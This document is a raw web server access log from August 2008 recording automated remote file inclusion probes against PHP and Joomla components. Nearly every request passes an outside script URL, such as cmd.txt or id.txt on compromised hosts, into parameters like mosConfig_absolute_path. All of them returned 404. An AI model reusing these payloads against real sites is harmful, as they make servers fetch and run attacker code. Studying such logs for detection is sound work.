62.231.161.4 - - [03/Aug/2008:17:56:50 -0700] "GET /logs/access_071231.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:17:56:50 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:17:56:51 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
76.74.137.190 - - [03/Aug/2008:17:57:34 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.collegiateforum.org"
76.74.137.190 - - [03/Aug/2008:17:57:34 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.collegiateforum.org"
216.246.78.8 - - [03/Aug/2008:17:57:46 -0700] "GET ///vwar/backup/errors.php?error=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.collegiateforum.org"
216.246.78.8 - - [03/Aug/2008:17:57:46 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.collegiateforum.org"
65.111.37.210 - - [03/Aug/2008:17:58:58 -0700] "GET /logs/%3Cbug%3E%3Cdork%3Ehttp://www.eshansingh.com//language/englishs.html?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.collegiateforum.org"
65.111.37.210 - - [03/Aug/2008:17:58:59 -0700] "GET /%3Cbug%3E%3Cdork%3Ehttp://www.eshansingh.com//language/englishs.html?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:17:59:22 -0700] "GET /logs/access_080317.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:17:59:22 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:17:59:23 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
218.219.147.58 - - [03/Aug/2008:18:01:15 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.collegiateforum.org"
218.219.147.58 - - [03/Aug/2008:18:01:15 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.collegiateforum.org"
125.175.78.175 - - [03/Aug/2008:18:02:10 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.collegiateforum.org"
125.175.78.175 - - [03/Aug/2008:18:02:11 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.collegiateforum.org"
216.139.67.20 - - [03/Aug/2008:18:03:18 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.collegiateforum.org"
216.139.67.20 - - [03/Aug/2008:18:03:18 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:18:05:54 -0700] "GET /logs/access_080526.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
193.178.118.47 - - [03/Aug/2008:18:06:05 -0700] "GET ///vwar/backup/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
193.178.118.47 - - [03/Aug/2008:18:06:05 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
193.178.118.47 - - [03/Aug/2008:18:06:05 -0700] "GET /logs///vwar/backup/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
85.214.41.164 - - [03/Aug/2008:18:07:35 -0700] "GET //errors.php?error=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.collegiateforum.org"
85.214.41.164 - - [03/Aug/2008:18:07:35 -0700] "GET /logs//errors.php?error=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.collegiateforum.org"
59.126.46.141 - - [03/Aug/2008:18:11:15 -0700] "GET /logs/access_080211.log/main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.6.17.155 - - [03/Aug/2008:18:12:50 -0700] "GET /Jonathan_Fantini_Porter/collegiateforumfund.php HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
67.195.37.178 - - [03/Aug/2008:18:18:40 -0700] "GET /Jonathan_Fantini_Porter/southkorea.php HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
82.146.39.200 - - [03/Aug/2008:18:19:07 -0700] "GET /logs/access.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.146.39.200 - - [03/Aug/2008:18:19:07 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.146.39.200 - - [03/Aug/2008:18:19:07 -0700] "GET /logs//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.146.39.200 - - [03/Aug/2008:18:19:18 -0700] "GET /logs/access_080121.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.146.39.200 - - [03/Aug/2008:18:19:18 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.146.39.200 - - [03/Aug/2008:18:19:18 -0700] "GET /logs//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.146.39.200 - - [03/Aug/2008:18:19:32 -0700] "GET /logs/access_080121.log/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.146.39.200 - - [03/Aug/2008:18:19:33 -0700] "GET /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.146.39.200 - - [03/Aug/2008:18:19:33 -0700] "GET /logs/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.146.39.200 - - [03/Aug/2008:18:20:40 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.93.200.219 - - [03/Aug/2008:18:21:46 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.15.186.5 - - [03/Aug/2008:18:23:02 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
67.15.186.5 - - [03/Aug/2008:18:23:03 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
195.93.200.219 - - [03/Aug/2008:18:26:21 -0700] "GET /logs/access_080121.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.93.200.219 - - [03/Aug/2008:18:26:21 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.93.200.219 - - [03/Aug/2008:18:26:21 -0700] "GET /logs//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.168.176.11 - - [03/Aug/2008:18:32:07 -0700] "GET /logs/access_080121.log/index.php?menu=http://www.cmc-clan.de/page/vwar/images/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.168.176.11 - - [03/Aug/2008:18:32:07 -0700] "GET /index.php?menu=http://www.cmc-clan.de/page/vwar/images/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.168.176.11 - - [03/Aug/2008:18:32:08 -0700] "GET /logs/index.php?menu=http://www.cmc-clan.de/page/vwar/images/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:18:34:05 -0700] "GET /logs/access_071231.log/images/errors.php?error=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:18:34:05 -0700] "GET /logs/images/errors.php?error=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:18:34:05 -0700] "GET /images/errors.php?error=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:18:35:24 -0700] "GET /images/errors.php?error=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:18:35:24 -0700] "GET /logs/images/errors.php?error=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.collegiateforum.org"
89.140.72.25 - - [03/Aug/2008:18:35:38 -0700] "GET /index1.php?id=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.140.72.25 - - [03/Aug/2008:18:35:38 -0700] "GET /logs/access_080616.log/index1.php?id=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.140.72.25 - - [03/Aug/2008:18:35:38 -0700] "GET /logs/index1.php?id=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:20 -0700] "GET /logs/access_080121.log//include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:21 -0700] "GET //include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:21 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:28 -0700] "GET /logs/access_080121.log//include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:28 -0700] "GET //include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:29 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:31 -0700] "GET /logs/access_080121.log//include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:32 -0700] "GET //include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:32 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:37 -0700] "GET /logs/access_080121.log//include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:37 -0700] "GET //include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:38 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:44 -0700] "GET /logs/access_080121.log//include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:45 -0700] "GET //include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.97.0.11 - - [03/Aug/2008:18:36:45 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.79.75.195 - - [03/Aug/2008:18:37:55 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.collegiateforum.org"
194.79.75.195 - - [03/Aug/2008:18:37:56 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.collegiateforum.org"
124.217.231.243 - - [03/Aug/2008:18:38:32 -0700] "GET /logs/access_071231.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.glos.kit.net/info?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
124.217.231.243 - - [03/Aug/2008:18:38:33 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.glos.kit.net/info?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
124.217.231.243 - - [03/Aug/2008:18:38:33 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.glos.kit.net/info?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
194.79.75.195 - - [03/Aug/2008:18:45:56 -0700] "GET //pjsfiles/modify.php?installed_config_file=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.collegiateforum.org"
194.79.75.195 - - [03/Aug/2008:18:45:56 -0700] "GET /logs//pjsfiles/modify.php?installed_config_file=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.collegiateforum.org"
75.101.157.249 - - [03/Aug/2008:18:46:30 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fallauna.com/coprald/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.collegiateforum.org"
75.101.157.249 - - [03/Aug/2008:18:46:30 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fallauna.com/coprald/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:18:46:47 -0700] "GET /logs/access_080121.log/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:18:46:48 -0700] "GET /components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:18:46:48 -0700] "GET /logs/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:18:47:21 -0700] "GET /logs/access_080121.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:18:47:21 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:18:47:21 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:18:47:26 -0700] "GET /logs/access_080121.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:18:47:26 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [03/Aug/2008:18:47:26 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:18:48:31 -0700] "GET /htmltonuke.php?filnavn=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:18:48:40 -0700] "GET /logs/htmltonuke.php?filnavn=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:18:48:44 -0700] "GET /logs/access_080526.log/htmltonuke.php?filnavn=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
69.93.189.130 - - [03/Aug/2008:18:49:15 -0700] "GET /logs/access_080121.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
69.93.189.130 - - [03/Aug/2008:18:49:15 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
69.93.189.130 - - [03/Aug/2008:18:49:15 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.97.201.148 - - [03/Aug/2008:18:49:52 -0700] "GET /logs/access_080317.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sujianto.com/od.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
209.97.201.148 - - [03/Aug/2008:18:49:52 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sujianto.com/od.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
209.97.201.148 - - [03/Aug/2008:18:49:52 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sujianto.com/od.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
98.129.33.59 - - [03/Aug/2008:18:50:52 -0700] "GET /logs/access_080121.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
98.129.33.59 - - [03/Aug/2008:18:50:52 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
98.129.33.59 - - [03/Aug/2008:18:50:52 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.146.39.200 - - [03/Aug/2008:18:52:47 -0700] "GET /logs/access_080428.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:18:54:15 -0700] "GET /logs/access_071231.log/images/errors.php?error=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
